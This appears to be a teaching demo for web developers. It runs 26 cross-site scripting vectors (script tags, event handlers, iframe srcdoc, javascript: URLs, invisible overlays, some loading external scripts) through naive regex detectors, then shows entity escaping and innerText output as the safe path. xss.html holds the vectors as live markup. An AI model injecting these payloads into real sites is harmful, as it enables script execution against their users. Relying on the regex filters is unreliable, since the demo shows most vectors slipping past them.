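<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>XSS</title>
</head>
<body>
  <p>
    <a href="xss.html">View XSS's in action here</a>
    - some may interfere with others; to view an individual vector, remove all other vectors
  </p>
  <hr>
  <!--
    Output targets filled by script.js:
    "results" and "results_text" are written through innerText,
    "results_html" is written through innerHTML, so anything sent there
    is parsed as markup and has to be escaped by the caller first.
  -->
  <pre id="results"></pre>
  <div id="results_html"></div>
  <div id="results_text"></div>
  <!-- Loaded last so the three output elements above already exist when it runs. -->
  <script src="script.js"></script>
</body>
</html>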
// Test corpus for the detection and escaping checks below: one markup string
// per entry, numbered by the "XSS - N" label inside it. The strings are only
// data here; the rest of the script passes them to isXss(), escapeHtml(),
// log_html() and log_text().
// Several entries put a space before ">" (for example "</script >"), which is
// enough to stop xssSimple from matching them.
var xsss = [
// 1-3: script elements (inline, explicit type, external src).
`<script >alert("XSS - 1");</script >`,
`<script type="application/javascript">alert("XSS - 2");</script >`,
`<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >`,
// 4: meta refresh redirect, no script involved.
`<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />`,
// 5-10: event-handler attributes (onerror / onfocus) on non-script elements.
`<input type="image" src onerror="alert('XSS - 5')">`,
`<object data="a.a" onerror="alert('XSS - 6')" />`,
`<object data="a.a" onerror="alert('XSS - 7')">`,
`<link data="a.a" onerror="alert('XSS - 8')">`,
// NOTE: the "// Uses console.log ..." text below sits inside the template
// literal, so it is part of the test string rather than a JavaScript comment.
`<input onfocus="console.log('XSS - 9')" autofocus> // Uses console.log as "alert" will cause infinate loop`,
`<video ><source onerror="alert('XSS - 10')" >`,
// 11-13: iframe srcdoc carrying a nested, attribute-less <script> tag.
`<iframe srcdoc="<script>alert('XSS - 11')</script>">`,
`<iframe srcdoc="<script>alert('XSS - 12')</script>" />`,
`<iframe srcdoc="<script>alert('XSS - 13')</script>"></iframe >`,
// 14-16: hidden iframes (external src, or onload handler).
`<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >`,
`<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">`,
`<iframe style="display:none;" src="//a.a" onload="alert('XSS - 16');"></iframe >`,
// 17-18: transparent full-page overlay elements with an onmousemove handler.
`<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 17')"></div >`,
`<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 18')">`,
// 19: frameset / frame onload.
`<frameset onload="alert('XSS - 19')"><frame onload="Limited support"></frameset >`,
// 20-22: anchors (javascript: URL, onclick, onmouseover) left unclosed.
`<a href="javascript:alert('XSS - 20')" style="text-decoration: none; color:#000;" > `,
`<a onclick="alert('XSS - 21')" style="text-decoration: none; color:#000;" > `,
`<a onmouseover="alert('XSS - 22')" style="text-decoration: none; color:#000;" > `,
// 23-25: body event handlers.
`<body onunload="alert('XSS - 23')">`,
`<body onresize="alert('XSS - 24');">`,
`<body onload="alert('XSS - 25')">`,
// Unnumbered last entry: style-only, no JavaScript. It sets opacity to 0 and
// disables pointer events on body, showing that stripping script alone does
// not make injected markup harmless.
`<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">`,
]
// Tag-shaped-string detectors used by the two isXss variants below. They
// inspect the input text only; the escaping and innerText examples further
// down show output handling that does not rely on recognising a pattern.

// xssSimple: "<" (or %3C), any number of "/" (or %2F), one or more letters,
// digits or "%", then ">" (or %3E); case-insensitive. This only matches tags
// that have no attributes and no whitespace before the closing bracket,
// such as "<b>" or "</script>".
var xssSimple = new RegExp('((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)', 'i')
// xssImgSrc: "<img" (each letter literal or percent-encoded), followed by at
// least one non-newline character and a closing ">" (or %3E); case-insensitive.
var xssImgSrc = new RegExp('((%3C)|<)((%69)|i|(%49))((%6D)|m|(%4D))((%67)|g|(%47))[^\n]+((%3E)|>)', 'i')
// xssAnyTag: "<>", "</>", or "<" followed by two or more characters up to the
// next ">" (with or without a leading "/"). Percent-encoded brackets are not
// covered, and a one-character tag such as "<b>" is left to xssSimple.
var xssAnyTag = new RegExp('<(|\/|[^\/>][^>]+|\/[^>][^>]+)>')
log("\n## Current isXss function:")

// Baseline detector: flags a value when it contains an attribute-less tag
// (xssSimple) or an <img ...> tag (xssImgSrc).
isXss = function (value) {
  if (xssSimple.test(value)) {
    return true;
  }
  return xssImgSrc.test(value);
}

// Prints one "result: isXss(`vector`)" line per corpus entry. Most entries
// print false, which is the gap this section demonstrates. Entries 11-13
// print true, because their srcdoc value embeds a bare "<script>" tag that
// xssSimple does match.
for (var i in xsss) {
  log([isXss(xsss[i]), ": isXss(`", xsss[i], "`)"].join(""));
}
log("\n## isXss function that strips all tags:")

// Extended detector: the baseline checks plus xssAnyTag, which matches any
// "<...>" pair. Despite the heading text, nothing is stripped here; the
// function only reports whether a tag-like sequence is present.
isXss = function (value) {
  if (xssSimple.test(value) || xssImgSrc.test(value)) {
    return true;
  }
  return xssAnyTag.test(value);
}

// Every corpus entry contains at least one "<...>" sequence, so each line
// printed by this loop starts with true.
for (var i in xsss) {
  log([isXss(xsss[i]), ": isXss(`", xsss[i], "`)"].join(""));
}
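// Maps each character that is significant in HTML text or attribute values
// to its entity reference. The values must be the entity forms: a map that
// returns the character itself makes escapeHtml a no-op, and an unescaped
// apostrophe value does not even parse.
var entityMap = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
  '/': '&#x2F;',
  '`': '&#x60;',
  '=': '&#x3D;'
};

/**
 * Encode a value for insertion into HTML element content or a quoted
 * attribute value.
 *
 * The value is converted with String() first, so numbers, null and undefined
 * are accepted. Each of & < > " ' ` = / is replaced by its entity reference,
 * so the browser renders the text instead of parsing it as markup.
 *
 * This encoding is for HTML text and quoted attribute contexts only; values
 * placed inside script, style or URL contexts need encoding for that context.
 *
 * @param {*} value - Value to encode.
 * @returns {string} The encoded string.
 */
var escapeHtml = function (value) {
  return String(value).replace(/[&<>"'`=\/]/g, function (ch) {
    return entityMap[ch];
  });
};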
// Output path 1: innerHTML. The heading is passed as trusted, hand-written
// markup; every corpus entry goes through escapeHtml() first, so it is
// expected to show up as visible text instead of being parsed.
log_html("<b>Directly writing escaped Html safely</b>")
for (var i in xsss) {
  log_html(
    escapeHtml(xsss[i])
  );
}

// Output path 2: innerText. No escaping is applied, because log_text never
// hands its argument to the HTML parser. The "</b>" at the end of the heading
// string is therefore displayed literally.
log_text("\n## Directly writing unescaped Html safely to the text attribute</b>")
for (var i in xsss) {
  log_text(
    xsss[i]
  );
}
/**
 * Append one line to the #results_text element as plain text.
 *
 * The value is assigned through innerText, so it is not parsed as markup;
 * callers can pass unescaped strings.
 *
 * @param {string} html - Text to append; a newline is added after it.
 */
function log_text(html) {
  var target = document.getElementById("results_text");
  target.innerText = target.innerText + html + "\n";
}
/**
 * Append one fragment to the #results_html element as markup.
 *
 * The value is assigned through innerHTML, so the browser parses whatever is
 * passed in. Escaping is the caller's job: anything that is not hand-written
 * markup should go through escapeHtml() before it reaches this function.
 *
 * @param {string} html - Markup to append; a "<br>" is added after it.
 */
function log_html(html) {
  var target = document.getElementById("results_html");
  target.innerHTML = target.innerHTML + html + "<br>";
}
/**
 * Append one line to the #results element as plain text.
 *
 * Uses innerText, so tag-like content in the message is shown verbatim
 * rather than parsed.
 *
 * @param {string} text - Message to append; a newline is added after it.
 */
function log(text) {
  var target = document.getElementById("results");
  target.innerText = target.innerText + text + "\n";
}
<!--
  Live counterpart of the xsss array in script.js: the same vectors, in the
  same order, written as real markup so a browser parses them.
  The markup is malformed on purpose (spaces before the closing bracket,
  unclosed elements, repeated body tags); an unclosed element can swallow the
  lines after it, which is why the note below says to keep a single line when
  checking one vector.
  Groups by label: 1 to 3 script elements; 4 meta refresh; 5 to 10 onerror and
  onfocus handlers; 11 to 13 iframe srcdoc; 14 to 16 hidden iframes; 17 and 18
  transparent overlays with onmousemove; 19 frameset; 20 to 22 anchors;
  23 to 25 body handlers; 26 style only.
  Entries 3, 14 and 15 load from rawgit.com and entry 4 redirects to
  httpbin.org, so those depend on third-party hosts being reachable.
-->
To test an individual vector, remove all except that line
<script >alert("XSS - 1");</script >
<script type="application/javascript">alert("XSS - 2");</script >
<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >
<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />
<input type="image" src onerror="alert('XSS - 5')">
<object data="a.a" onerror="alert('XSS - 6')" />
<object data="a.a" onerror="alert('XSS - 7')">
<link data="a.a" onerror="alert('XSS - 8')">
<input onfocus="console.log('XSS - 9')" autofocus> // Uses console.log as "alert" will cause infinate loop
<video ><source onerror="alert('XSS - 10')" >
<iframe srcdoc="<script>alert('XSS - 11')</script>">
<iframe srcdoc="<script>alert('XSS - 12')</script>" />
<iframe srcdoc="<script>alert('XSS - 13')</script>"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">
<iframe style="display:none;" src="//a.a" onload="alert('XSS - 16');"></iframe >
<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 17')"></div >
<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 18')">
<frameset onload="alert('XSS - 19')"><frame onload="Limited support"></frameset >
<a href="javascript:alert('XSS - 20')" style="text-decoration: none; color:#000;" >
<a onclick="alert('XSS - 21')" style="text-decoration: none; color:#000;" >
<a onmouseover="alert('XSS - 22')" style="text-decoration: none; color:#000;" >
<body onunload="alert('XSS - 23')">
<body onresize="alert('XSS - 24');">
<body onload="alert('XSS - 25')">
<!-- XSS - 26: No JavaScript, but fully hides the page and prevents any clicks -->
<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">